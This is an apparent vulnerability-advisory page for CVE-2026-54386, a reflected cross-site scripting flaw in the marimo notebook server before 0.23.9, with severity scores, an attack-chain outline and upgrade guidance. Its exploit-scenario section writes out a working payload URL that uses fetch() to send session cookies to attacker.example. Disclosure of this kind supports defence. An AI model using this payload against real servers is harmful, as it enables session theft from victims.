Skip to main content

marimo CVE-2026-54386

| EUVDEUVD-2026-37809 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-17 VulnCheck GHSA-8m59-7xv8-735h
5.1
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Network-delivered reflected XSS requires no attacker privileges but mandates victim interaction; scope changes to the browser enabling limited confidentiality and integrity impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 22:22 vuln.today
Analysis Generated
Jun 17, 2026 - 22:22 vuln.today

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1 pypi packages depend on marimo (1 direct, 0 indirect)

Ecosystem-wide dependent count for version 0.23.9.

DescriptionCVE.org

marimo before 0.23.9 contains a reflected cross-site scripting vulnerability in the notebook page that allows unauthenticated attackers to inject arbitrary JavaScript by exploiting improper escaping of single quotes in the file query parameter reflected into an inline JavaScript string literal. Attackers can craft a malicious link with a payload beginning with __new__ to bypass the 404 check and inject JavaScript into the page, which executes without Content-Security-Policy restrictions in the origin of a victim's marimo server.

AnalysisAI

Reflected XSS in the marimo notebook server before version 0.23.9 enables unauthenticated remote attackers to inject and execute arbitrary JavaScript in the origin of a victim's marimo server by supplying a crafted file query parameter. The flaw stems from improper single-quote escaping in assets.py when reflecting the parameter into an inline JavaScript string literal; attackers bypass the server's 404 check by prefixing payloads with __new__, and execution occurs without Content-Security-Policy restrictions. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker identifies accessible marimo server
Delivery
Craft file parameter payload prefixed with __new__
Exploit
Deliver malicious URL to victim via phishing or link sharing
Install
Victim clicks link and loads notebook page
C2
Single quote in file parameter breaks JavaScript string literal context
Execute
Injected script executes in marimo server origin
Impact
Attacker exfiltrates session data or manipulates notebook

Vulnerability AssessmentAI

Exploitation Exploitation requires the following specific conditions: (1) the victim must click or otherwise navigate to a crafted URL containing the malicious `file` query parameter - active user interaction is mandatory per CVSS UI:A, and drive-by or passive exploitation is not possible; (2) the `file` parameter value must begin with the string `__new__` to bypass marimo's 404 file-existence check and proceed to the vulnerable rendering path; (3) the marimo notebook server must be network-reachable to the attacker for crafting and to the victim for delivery. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.1 (Medium) accurately reflects the constrained impact profile: mandatory active user interaction (UI:A) is the primary limiting factor, with no vulnerable-system impact (VC:N/VI:N/VA:N) and only limited subsequent-system impact (SC:L/SI:L). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker targeting a publicly accessible marimo deployment crafts a URL such as `https://marimo.example.com/notebook?file=__new__';fetch('https://attacker.example/steal?c='+document.cookie)//`, where the `__new__` prefix bypasses the 404 guard and the trailing single-quote breaks out of the JavaScript string literal in the rendered page. The attacker sends this URL to a victim who has an active marimo session; upon clicking, the victim's browser executes the injected script in the marimo server's origin, exfiltrating session cookies or notebook content to the attacker-controlled endpoint. …
Remediation Upgrade to marimo 0.23.9 or later, which resolves the vulnerability via commit fdd55c8cf6260ae23bb411dc9d9269def5cf75d6 (https://github.com/marimo-team/marimo/commit/fdd55c8cf6260ae23bb411dc9d9269def5cf75d6); the release is available at https://github.com/marimo-team/marimo/releases/tag/0.23.9. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-54386 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy